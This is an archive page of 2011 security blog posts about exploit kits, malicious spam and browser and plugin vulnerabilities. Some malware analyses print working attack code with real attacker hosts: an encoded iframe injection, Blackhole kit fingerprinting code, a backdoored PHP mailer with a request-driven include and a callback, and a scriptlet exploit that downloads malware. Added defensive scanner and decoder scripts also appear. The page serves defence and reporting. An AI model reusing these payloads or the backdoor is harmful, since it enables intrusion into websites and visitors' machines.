Tag Archive | "Exploit"

Poisoned Google image searches becoming a problem

If you are a regular user of Google’s search engine you might have noticed that poisoned search results have practically become a common occurrence.

Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble cleaning up its image search results.

ISC’s Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and showed that it is rather simple.

For one, they attack and compromise a great variety of legitimate websites – usually those which use WordPress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it.

Then, they introduce PHP scripts in the sites’ source code. “These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content,” he explains.

They also harvest other sites for images, and embed them into the site. When the scripts detect Google’s crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database.

“The exploit happens when a user clicks on the thumbnail,” says Zdrnja. “Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background.”

Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script – this time it’s a JavaScript one – that redirects the browser to another compromised site that serves malware.
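The referer check described above is something a site owner can test for on their own pages: fetch the same URL twice, once with a Google referer and once without, and compare what comes back. The following Node.js script is an added example, not code from the ISC diary or this article. `checkUrl` assumes Node 18 or later for the global `fetch` and needs network access; the constructed pair of responses at the bottom exercises the comparison offline, and `example.invalid` is a placeholder host.

```javascript
// Added example (not from the ISC diary or this article): detect referer
// based cloaking on a site you administer by fetching the same URL with and
// without a Google referer and diffing the redirect indicators.

// Ways a page can push the visitor somewhere else; the result is a set of
// labelled indicators so two responses can be compared.
function redirectIndicators({ html, location = null }) {
  const found = new Set();
  if (location) found.add('http-redirect:' + location);
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) found.add('script:' + m[1]);
  for (const m of html.matchAll(/\blocation(?:\.href)?\s*=\s*["']([^"']+)["']/gi)) found.add('location:' + m[1]);
  for (const m of html.matchAll(/<meta\b[^>]*http-equiv\s*=\s*["']refresh["'][^>]*url=([^"'\s>]+)/gi)) found.add('meta-refresh:' + m[1]);
  if (/<iframe\b[^>]*display\s*:\s*none/i.test(html)) found.add('hidden-iframe');
  return found;
}

// Indicators that appear only when the Google referer was sent are the
// cloaked behaviour; a clean site yields an empty list.
function compareResponses(plain, withReferer) {
  const base = redirectIndicators(plain);
  const cloaked = [...redirectIndicators(withReferer)].filter(x => !base.has(x));
  return { cloaked, suspicious: cloaked.length > 0 };
}

// Live check. Assumes Node 18+ (global fetch); not exercised offline.
async function checkUrl(url, fetchImpl = globalThis.fetch) {
  const snapshot = async headers => {
    const r = await fetchImpl(url, { headers, redirect: 'manual' });
    return { html: await r.text(), location: r.headers.get('location') };
  };
  const ua = 'Mozilla/5.0';
  const plain = await snapshot({ 'User-Agent': ua });
  const withRef = await snapshot({ 'User-Agent': ua, Referer: 'https://www.google.com/imgres?q=test' });
  return compareResponses(plain, withRef);
}

// Constructed sample: a clean page, and what a cloaking script would serve
// to a visitor arriving from Google. example.invalid is a placeholder host.
const CLEAN = { html: '<html><body><h1>Trending topic</h1><img src="/img/1.jpg"></body></html>' };
const CLOAKED = { html: CLEAN.html.replace('</body>', '<script>window.location="http://example.invalid/go.php";</script></body>') };

console.log(compareResponses(CLEAN, CLOAKED));
```

Run `checkUrl('https://your-site.example/')` from a host that is not your own server, since the injected scripts also key on the visitor, and compare a few different pages: the cloaking is usually confined to the pages the crawler has already indexed.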

Users should be careful about what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as NoScript for Firefox, but believes that Google could help by not using an iframe to display the results.

Posted in Security

Firefox 4 gets its first security update

Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser’s first-ever security update. The Firefox version number bumps up to 4.0.1.

The update fixes 50-odd bugs in total, amusingly including three fixes listed as specific to OS/2. Ironically, the latest official release of the OS/2 port of Firefox, dubbed Warpzilla, hasn’t yet reached version 4 – it’s still back at version 3.6.8.

The release notes for Firefox 4.0.1 are hard to find from the main Mozilla.com page. (Browsing to Firefox.com doesn’t help, as this just redirects to the Mozilla page.) But if you know where to look, you’ll find that two critical security advisories are fixed in the 4.0.1 release.

MFSA2011-12 deals with memory corruption bugs in the browser engine itself; Mozilla experts officially opined that “with enough effort at least some of these could be exploited to run arbitrary code”. MFSA2011-17 deals with “two crashes that could potentially be exploited to run malicious code” in a graphics library called WebGLES, used by Firefox.

Because the 4.0.1 update addresses vulnerabilities that are considered remotely exploitable, we advise you to apply this update without delay.

The previous version, Firefox 3.6, also gets an update, moving to 3.6.17. This update also squashes some critical bugs, including the MFSA2011-12 memory corruption vulnerability affecting Firefox 4.

Two other critical vulnerabilities which don’t affect version 4 are fixed.

MFSA2011-13 deals with various “dangling pointer” bugs (a dangling pointer is a programming mistake in which a memory reference remains in use after the memory it points to has been freed and made available for re-use). MFSA2011-15 deals with a privilege escalation bug in the Java Embedding Plugin.

The MFSA2011-15 vulnerability is specific to the Mac OS X version of Firefox. Apple users who imagine themselves invulnerable simply by virtue of their choice of operating system, please take note!

There’s an update to Mozilla’s Thunderbird email client as well. Thunderbird moves to version 3.1.10.

Somewhat confusingly, the Thunderbird release notes don’t list any critical vulnerabilities fixed in this version, but the MFSA2011-12 advisory specifically states that the bugs it covers are “fixed in Thunderbird 3.0.10”.

If you’re a Thunderbird user, we advise you, too, to update as soon as you can.

Posted in Sophos

Web Security Gets Another Reality Check

On April 11, Malaysian hackers embarrassed Barracuda Networks by exploiting a code vulnerability via SQL injection and triumphantly posting names, email addresses, and passwords belonging to Barracuda’s partners, customers, and employees.

California-based Barracuda is a major player in the digital security market, boasting IBM, FedEx, and Coca-Cola among its clients. According to Barracuda’s own assessment, it was a system error that opened the doors to an automated script when a firewall was “inadvertently” left in offline mode during a maintenance window. The crawler found an SQL injection vulnerability and siphoned names and email addresses (but not financial data) of leads, partners, and employees.

Details of the attack were proudly posted at the HMSec Full Exposure Website. The loss of the data has raised concerns about Barracuda’s partners’ increased risk of spear phishing. This breach followed other attacks, such as one on RSA‘s highly regarded SecurID two-factor authentication product, a successful breach of Comodo’s SSL certificate system, and the theft of a phisher’s treasury of email data from marketing service Epsilon — all in the last five weeks.

Comodo, which claims more than 200,000 business customers, brands itself as “creating trust online.” If the RSA data theft illustrated the vulnerability of cutting-edge digital security, Comodo’s release of fraudulently obtained SSL certificates for sites like Google and Skype, no matter how quickly revoked, cut right to the heart of consumer concern about trust in Internet transactions. And it calls to mind the limitations of the government’s plan for regulating Web security.

The federal government’s National Strategy for Trusted Identities in Cyberspace (NSTIC) is at least three years away from its eventual goal of presenting the consumer with a choice of reliable credentialing products. There are no technical specifications as yet for the solutions the government expects the private sector to offer, but whatever combination of enhanced password practices, encryption, personal keys, and even biometrics rings the bell, the enabling software has to sit somewhere in cyberspace.

The casual assumption that third-party security vendors are the safe hands on the team is likely to be challenged if the current trend of high-profile thefts and attacks continues. According to security applications reviewer Veracode’s new report, “The State of Software Security Volume III,” a remarkable 72 percent of software applications developed by security services and vendors failed to achieve acceptable security quality when first tested for vulnerabilities to attacks like SQL injection and XSS — worse than the 66 percent fail record for applications from all sources.

Although re-testing showed fast and effective remediation, as Veracode’s Jonaki Egelnof said in a live Webinar presenting the findings, the data “does help explain some of the headlines we’ve been seeing recently.”

Security vendors can recover from the recent onslaught, improve their systems, and patch their tender spots. But the impression is reinforced, almost weekly, that the wish list of government and legislators for a secure environment for digital commerce remains out of touch with the realities of digital security.

- Kim Davis, Community Editor, Internet Evolution

Posted in Security


Limit Flash Exploit Exposure, Uninstall ActiveX Version

Yesterday, Adobe issued Security Advisory APSA11-02. The advisory states that:

“A critical vulnerability exists in Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 10.2.156.12 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.”

And… this new vulnerability is currently being exploited in the wild:

“There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment, targeting the Windows platform.”

Flash files embedded in Office?

This attack vector prompted the following question from Brian Krebs: Does anyone know of a reliable way to disable the rendering of Flash objects in MS Office files across the board?

Our thought is why disable what you can easily uninstall?

We don’t generally use Internet Explorer, so we don’t need the IE version of Flash Player enabled at all. For Flash on the Web, you can use a designated browser (other than IE). Do you really need Flash enabled for Office?

This is what Microsoft Office will prompt when opening a document/spreadsheet/presentation containing embedded Flash content with no ActiveX version of Flash installed.

Some controls on this presentation can't be activated.

The “Non-IE” versions of Flash Player are of course still vulnerable to exploit, but it’s harder to imagine a successful targeted attack (via e-mail) against them, which is probably why current attacks are using Office.

Incidentally, it looks as if the next version of Flash Player (10.3) will include a control panel applet:

Flash control panel applet

Looks promising:

Flash Player Settings Manager

On 12/04/11 At 03:27 PM

Posted in F-Secure

USPS.gov Website Infected with Blackhole Exploit Kit

Update (04/07/2011 10:03am PST): USPS officials have taken the http://ribbs.usps.gov web site down to address the infection.

A United States Postal Service website (http://ribbs.usps.gov) has been infected with the Blackhole Exploit kit. As we’ve discussed previously, the Blackhole Exploit kit, a commercial exploit kit developed by Russian hackers, is being seen in an increasing number of attacks. Last week, we reported on how it had been used to infect Worldfest, a Houston, Texas music festival, and this week it has penetrated the website of an independent US government agency, namely that of the postal service. RIBBS stands for Rapid Information Bulletin Board System and deals with Intelligent Mail services, such as barcodes that allow for better tracking and logistics. As with similar infections, the attack follows numerous phases, each hosted on a separate domain and each leveraging various obfuscation techniques to hide the attack. Here we will walk through the various phases to detail the attack.

Phase One: Initial Infection

On April 6th, our attention was drawn to alerts indicating that Zscaler was blocking access to http://ribbs.usps.gov due to the presence of the following encoded Javascript:

<script>
document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,
116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,
99,61,34,104,116,116,112,58,47,47,112,114,105,99,104,101,115,111,110,
46,104,100,100,49,46,114,117,47,108,111,108,46,112,104,112,34,32,104,
101,105,103,104,116,61,34,49,34,32,119,105,100,116,104,61,34,49,34,32,
115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,
101,34,62,60,47,105,102,114,97,109,101,62,39,41,59)));
</script>

This content uses a simple encoding technique, whereby each character is represented by its ASCII code. When decoded, we see the following iframe:

document.write('<iframe src="http://pricheson.hdd1.ru/lol.php"
height="1" width="1" style="display:none"></iframe>');

Phase Two: Redirection


The page used in the aforementioned iframe has since been taken offline, presumably by the domain administrator, suggesting that the attackers were simply using an otherwise legitimate site for this stage of the attack. The page was however accessible when the attack was first discovered and contained only the following unencoded iframe:

<script>document.write('<iframe src="http://oldschool.vv.cc/access7/
forum.php?tp=10169-1" height="1" width="1" style="display:none"></iframe>');</script>
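Decoding a String.fromCharCode payload like the one in phase one does not require running it: the numeric arguments can be mapped to characters statically, and the iframe target read out of the result. The following JavaScript is an added example, not Zscaler's code; the two sample scripts are constructed copies of the phase-one and phase-two listings above. The 1x1 / display:none heuristic will also flag benign tracking iframes, so treat it as a triage signal rather than a verdict.

```javascript
// Added example (not Zscaler's code): decode String.fromCharCode payloads
// statically (no eval) and pull hidden iframe targets out of the result.

// Constructed samples: copies of the phase-one and phase-two scripts above.
const PHASE_ONE = `<script>
document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,
116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,
99,61,34,104,116,116,112,58,47,47,112,114,105,99,104,101,115,111,110,
46,104,100,100,49,46,114,117,47,108,111,108,46,112,104,112,34,32,104,
101,105,103,104,116,61,34,49,34,32,119,105,100,116,104,61,34,49,34,32,
115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,
101,34,62,60,47,105,102,114,97,109,101,62,39,41,59)));
</script>`;

const PHASE_TWO = `<script>document.write('<iframe src="http://oldschool.vv.cc/access7/forum.php?tp=10169-1" height="1" width="1" style="display:none"></iframe>');</script>`;

// Every String.fromCharCode(...) call whose arguments are plain integers is
// decoded by mapping the numbers to characters. Returns one string per call.
function decodeFromCharCode(src) {
  const layers = [];
  const call = /String\.fromCharCode\s*\(\s*([\d\s,]+)\)/g;
  for (const m of src.matchAll(call)) {
    const codes = m[1].split(',').map(n => parseInt(n, 10)).filter(n => !Number.isNaN(n));
    layers.push(String.fromCharCode(...codes));
  }
  return layers;
}

// Attribute reader for a single tag; handles unquoted and quoted values.
function attr(tag, name) {
  const m = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(tag);
  return m ? m[1] : null;
}

// Returns one record per <iframe> in the html, marking the ones that are
// sized 1x1 or hidden with display:none, the shape drive-by injections use.
function extractIframes(html) {
  return (html.match(/<iframe\b[^>]*>/gi) || []).map(tag => {
    const width = attr(tag, 'width'), height = attr(tag, 'height');
    const styleMatch = /\bstyle\s*=\s*["']([^"']*)["']/i.exec(tag);
    const hiddenByStyle = !!styleMatch && /display\s*:\s*none/i.test(styleMatch[1]);
    const tiny = [width, height].some(v => v !== null && parseInt(v, 10) <= 1);
    return { src: attr(tag, 'src'), width, height, hidden: hiddenByStyle || tiny };
  });
}

// Decodes whatever layers the script carries and reports hidden iframe
// targets found in the raw source or in any decoded layer.
function analyzeInjectedScript(src) {
  const layers = decodeFromCharCode(src);
  const iframes = extractIframes([src, ...layers].join('\n'));
  return {
    layers,
    iframes,
    hiddenTargets: iframes.filter(f => f.hidden && f.src).map(f => f.src),
  };
}

// Stand-alone run: prints the hidden iframe target for both samples.
for (const [name, sample] of [['phase one', PHASE_ONE], ['phase two', PHASE_TWO]]) {
  const r = analyzeInjectedScript(sample);
  console.log(name, '->', r.hiddenTargets.join(', ') || '(none)');
}
```

Only one decoding layer is handled here because that is all this sample uses; kits that nest eval inside the decoded string need the same step applied again to each layer.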

Phase Three: Attack


It is on this final page, where the attack ultimately takes place. This domain has been known to host other attacks. At the time the attack was first detected, this domain had not been blacklisted by any of the major malicious URL services, but as of today, the majority are now blocking the domain.

This page has been disguised to look like a standard 404 Page Not Found error message, but when viewing the source code, in reality, it is delivering a massive bundle of obfuscated Javascript. When decoded, we see a rather complex logic flow attempting to discern the operating system, web browser type and the existence/absence of components such as Java and ActiveX, in order to determine the appropriate attack payloads to deploy.

Operating System Identification


var c=this,a=navigator,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",
h=a.product||"";
c.OS=100;
if(b)
{
var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,
"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];
for(f=d.length-2;

Browser Identification

c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);
c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;
c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);
c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;
c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;
c.addWinEvent("load",c.handler(c.runWLfuncs,c))



Malicious Payloads

  • calc.exe – detection rate: (5/41 AV vendors)
  • info.exe – detection rate: (4/42 AV vendors)
  • mario.jar – detection rate: (4/41 AV vendors)
  • eedad.pdf – detection rate: (1/41 AV vendors)
  • 298dd.pdf – detection rate: (5/42 AV vendors)
  • 27537.pdf – detection rate: (5/41 AV vendors)
  • 57496.pdf – detection rate: (1/42 AV vendors)
  • javatrust.php – detection rate: (0/42 AV vendors)
  • java_skyline.php – detection rate: (2/41 AV vendors)

Status

Yet again, we have a legitimate website with a significant user base being used as a catalyst for attack. Combine that with an abysmal detection rate on the malicious payloads by desktop AV, the first and often only line of client side defense for many enterprises, and we have a potent attack that has no doubt affected many end users.

USPS officials have been informed of the infection and have acknowledged the issue. The injected code remains on the ribbs.usps.gov site as of the time of this posting, but the attack has been neutered because the website used in step two of the attack has been taken offline.

At least snail mail is still safe…

- michael

Posted in Security

Zbot and Black Hole Exploit Kit “all in one” fake Facebook notification Emails

Websense® Security Labs™ Threatseeker® network has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the cybercriminals employ two attack vectors: social engineering and an exploit kit. Both end with the Zeus/Zbot Trojan installed on the targeted machines.

Websense customers are protected from this attack with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

Here is an example of a malicious email in Spanish:

The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection rate.

The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today – the Blackhole exploit kit. Any successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine.

Here is an example iframe from the Facebook attack page that points to Blackhole exploit kit:

Posted in Facebook

Excel File Containing Adobe Zero-Day Exploit Found

We got hold of an exploit targeting the vulnerability Adobe reported in its most recent security advisory.

The exploit, detected as TROJ_ADOBFP.B (now detected as TROJ_ADOBFP.SM), takes advantage of the referenced vulnerability to drop another malicious file detected as TROJ_DROPPER.ADO.

TROJ_ADOBFP.B arrives in users’ systems as a malicious .SWF file that has been embedded into an .XLS file. This .SWF file contains the code for the exploit. TROJ_DROPPER.ADO, on the other hand, drops another malicious file detected as BKDR_COSMU.KO. BKDR_COSMU.KO connects to a URL to execute certain commands. It also retrieves information from the affected system such as drive information, OS, file or directory list, as well as a list of existing processes and services.

The vulnerability related to this threat affects the following software and their corresponding versions:

  • Adobe Flash Player 10.2.152.33 for Windows, Macintosh, Linux, and Solaris OSs
  • Adobe Flash Player 10.1.106.16 and earlier versions for Android
  • Adobe Reader and Acrobat X (10.0.1) for Windows and Macintosh OSs (specifically the Authplay.dll component)

Adobe posted a schedule for the release of security updates that will address this vulnerability. All affected versions, except Adobe Reader X, will be patched on March 21. The update for Adobe Reader X will be released on June 14. Until the updates are released, users are advised to be extra careful, especially when dealing with .XLS files coming from unknown users.

Post from: TrendLabs | Malware Blog – by Trend Micro


Posted in Trendmicro

k0desploit Exploit Kit and Stolen Credit Cards Discovered

During our investigative research into existing and emerging threats, we tend to make new discoveries.  One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page (“K0de.org Open Source Exploits”) caught our attention, as we wondered how ‘open-source’ this toolkit really was. A quick Google search led us to the third result:

Leaked Message from Exploit Kit Author

The post (or ‘paste’ if we go by Pastie.org’s terminology) contained a leaked message written by the toolkit author in a private hacker forum. It reveals that this new toolkit is just a clone of the popular Eleonore with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe.  Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here’s a screen-shot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that upon our notice, both Google and pastie.org have removed the illegal content, prior to publishing this blog post.

Posted in Security

Email with offer for ‘Base de datos Mexico 2011’ contains PHP exploit

MX Lab, http://www.mxlab.eu, started to intercept an interesting exploit based on PHP. The email comes in with the subject “Mexico 2011”, is sent from the spoofed address “noreply@prodigy.net.mx” and has the following body:

Attached to the message is a small ZIP file named Mbeta.zip. Once extracted you will have a folder “mailer” with two files inside: Mh.php and Tutorial.txt.

This is the content of the tutorial:

TUTORIAL: descomprime el archivo
1* Guardar el archivo Mh.php (Mailer) en su pc.
2* LO suben a su hosting por FTP
3*Una vez subido al hosting entrar desde la web ej www.sudominio.com/Mh.php
4*Este es la version beta con limitaciones, la version full se vende en el pack.
emaileficaz@yahoo.com

Translated:

TUTORIAL: unzip the file
1* Save the file Mh.php (Mailer) on your pc
2* Load up to your FTP hosting
3*Once this is done visit your web site at www.sudominio.com/Mh.php
4*This is the beta version with limitations, the full version is sold in the pack.
emaileficaz@yahoo.com

When you open the PHP on a web server you will have the following webform:

MX Lab has analyzed the PHP code in the attachment. It appears to be a script for sending out mass mailings, but it also contains additional code that turns your web server into a target: it reports the script’s location to the author, and lets anyone who knows the URL include a file of their choosing through the x parameter.

if (trim($_GET['x'])!=''){@include($_GET['x']);exit();}
$email = 'hatuey30@hotmail.com';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y .'\n\n You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>\r\n');

This code emails the full URL at which the script is installed to an address hard-coded in the script, in this case hatuey30@hotmail.com.

We have replaced the address by our own address and have removed the mass mailing feature just to test. The email that we got is:

Hey , this is a new victim’s exploit: http://www.mydomain.com/Mh.php\n\n You can use (x=shell_url) at the end of the link
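The two behaviours in the mailer, an include whose path comes straight from the request and a mail() call that reports the host's own URL, are easy to check for statically before anything is uploaded to a hosting account. The JavaScript below is an added example, not MX Lab's code; the rule list is mine, and the sample is a constructed copy of the one-liner quoted above split onto several lines.

```javascript
// Added example (not MX Lab's code): a static check that flags request-
// driven includes and mail() calls that leak this server's location in
// PHP source. Run it over any script you were asked to upload.

// Constructed sample: the one-liner from the post, split onto several lines.
const SAMPLE_PHP = `<?php
if (trim($_GET['x'])!=''){@include($_GET['x']);exit();}
$email = 'hatuey30@hotmail.com';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\\'s exploit: '. $y .'\\n\\n You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>\\r\\n');
`;

// Rule list (my own, built from the sample; extend it for your own triage).
const RULES = [
  {
    id: 'include-from-request',
    re: /\b(?:include|include_once|require|require_once)\s*\(?\s*\$_(?:GET|POST|REQUEST|COOKIE)\b/g,
    why: 'include path comes straight from request input (remote or local file inclusion)',
  },
  {
    id: 'server-location-mailed',
    re: /\bmail\s*\([^;]*\$_SERVER\s*\[\s*['"](?:HTTP_HOST|REQUEST_URI|PHP_SELF|SERVER_NAME)['"]/g,
    why: 'mail() sends identifiers of this host to someone',
  },
  {
    id: 'hard-coded-recipient',
    re: /\$\w+\s*=\s*['"][^'"@\s]+@[^'"\s]+['"]\s*;/g,
    why: 'e-mail address hard-coded in the script',
  },
  {
    id: 'suppressed-errors',
    re: /@\s*(?:include|include_once|require|require_once|mail)\b/g,
    why: 'error suppression on a sensitive call',
  },
];

// Runs every rule over the source and returns one finding per match,
// with the line number where it occurred.
function scanPhp(src) {
  const findings = [];
  for (const rule of RULES) {
    for (const m of src.matchAll(rule.re)) {
      const line = src.slice(0, m.index).split('\n').length;
      findings.push({ rule: rule.id, line, snippet: m[0].slice(0, 60), why: rule.why });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// A request-driven include together with outbound mail of the script's own
// URL is the "register the new victim" pattern from the post.
function verdict(findings) {
  const ids = new Set(findings.map(f => f.rule));
  if (ids.has('include-from-request') && ids.has('server-location-mailed')) return 'backdoor-with-callback';
  if (ids.has('include-from-request')) return 'file-inclusion';
  return ids.size ? 'review' : 'clean';
}

// Stand-alone run over the sample.
const results = scanPhp(SAMPLE_PHP);
for (const f of results) console.log(`line ${f.line}: ${f.rule} (${f.why})`);
console.log('verdict:', verdict(results));
```

Regex rules of this kind are deliberately coarse; they will miss an include whose argument passes through a variable first, so a hit is a reason to read the file, and a miss is not a clean bill of health.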

It is clear that with this PHP technique your web server is at risk. So don’t be fooled by offers that sound too good to be true, and do not install any scripts, whether PHP, ASP or ColdFusion, that are sent to you by email on your web server or shared hosting server.

Posted in Security

Heads up… 0-day in an exploit kit

Hi folks,

It’s fairly well known (well, well-known if you’re a security geek) that CVE-2010-3962 is in the Wild, but over the last couple of days, we’ve begun detecting it in the Eleonore Exploit Kit.

This raises the stakes considerably, as it means that anyone can buy the kit for a few hundred bucks, and they have a working 0-day.

What this means to Microsoft, is that they should consider issuing an out-of-band patch.

What this means to you, if you’re a non-geek, is that until Microsoft releases said patch, you should install something that’s pretty good at detecting and blocking web-based attacks. <Shameless self-promotion mode ON> Ahem…LinkScanner is free, and works with everyone’s antivirus, even if you’re not an AVG customer. <Shameless self-promotion mode OFF>

Seriously though, it _is_ in the Wild, and you do have to be careful.

Keep safe folks,

Roger

Posted in AVG

Old exploit still kicking (CVE-2004-0380)

Some exploits just do not want to go away.

Case in point is an exploit for CVE-2004-0380 (yes, 2004!) that I have recently found in hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:

<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
  data="&#77&#75&#58&#64&#77&#83&#73&#84&#83&#116&#111&#114&#101&#58&#109
    &#104&#116&#109&#108&#58&#99&#58&#92&#46&#109&#104&#116&#33&#104&#116
    &#116&#112&#58&#47/http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>

The object tag instantiates a scriptlet. A scriptlet is essentially a reusable object written as a regular web page in which scripts follow certain conventions. Think of ActiveX controls implemented in HTML and VBScript. For the sake of historical completeness, scriptlets were introduced in Internet Explorer 4, deprecated in Internet Explorer 5, and disabled by default in Internet Explorer 7. Talk about a successful technology…

After a simple decoding step, the data attribute of the scriptlet reveals the content MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg ::/102.htm, which, on a vulnerable system, would cause the malware logo.gif to be downloaded on the victim’s computer.

The malware logo.gif has surprisingly good detection on VirusTotal (34/41!). I wonder if it has also been around since 2004…

Posted in Security

PDF Exploit Disguised as a Xerox Scanned Document

Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks, however, have imitated the email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner.

Variations of subject lines were used like “Scan from XER0X”, “Scan from XER0X ZIP Office”, “Scan from XER0X Center Office” or “Scan from XER0X Center Office”. In the image above, the attachment is actually not a Xerox WorkCentre Pro scanned document but instead a PDF exploit file that utilizes old Adobe Acrobat Reader vulnerabilities:

  1. Collab.collectEmailInfo (CVE-2007-5659) – Adobe Reader and Acrobat Multiple Stack-based Buffer Overflow Vulnerabilities
  2. Utilprintf (CVE-2008-2992) – Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability
  3. Collab.getIcon  (CVE-2009-0927) – Adobe Acrobat and Reader Collab ‘getIcon()’ JavaScript Method Remote Code Execution Vulnerability
  4. mediaNewplayer (CVE-2009-4324) – Adobe Reader and Acrobat ‘newplayer()’ JavaScript Method Remote Code Execution Vulnerability

Closer look of the attached PDF exploit

The payload of the PDF exploit downloads a Trojan downloader that installs additional malware, such as Fake AV, on the victim’s machine.

Cyber criminals will always strive to find ways to spread their malware. The first time we saw this Xerox spam campaign was in the middle of last year, when almost exactly the same spam template was used. The only difference between the two was that the malicious attachment used at that time was compressed in ZIP format. Xerox WorkCentre Pro, however, doesn’t send ZIP file attachments. It’s possible that the cyber criminals realized that PDF format looks more realistic and could deceive more users, especially in an office environment.

Posted in Security

Now Exploiting: Phoenix Exploit Kit Version 2.5

The Phoenix Exploit Kit is now available in version 2.5 in the cybercrime underground.

Exploit kits are but one of the different tools used by cybercriminals for DIY Cybercrime. The Phoenix Exploit Kit is a good example of exploit packs used to exploit vulnerable software on computers of unsuspecting Internet users. Often, cybercriminals drive traffic to the exploit kit by compromising legitimate websites and inserting IFRAMEs that point to the exploit kit or by poisoning search engine results that take users to the exploit kit.


When users land on a page injected with the exploit kit, it detects the version of the user’s Web browser and operating system and then attempts to exploit either the user’s browser or a browser plugin application. The latest version of the Phoenix Exploit Kit currently has payloads for nine different system configurations:

  • XPIE7 – Internet Explorer 7 and either Windows XP, Windows XP SP2 or Windows 2003
  • VISTAIE7 – Internet Explorer 7 and Windows Vista
  • XPIE8 – Internet Explorer 8 and either Windows XP, Windows XP SP2 or Windows 2003
  • VISTAIE8 – Internet Explorer 8 and Windows Vista
  • IE – Versions of Internet Explorer that are not IE7 or IE8
  • WIN7IE – Internet Explorer and Windows 7
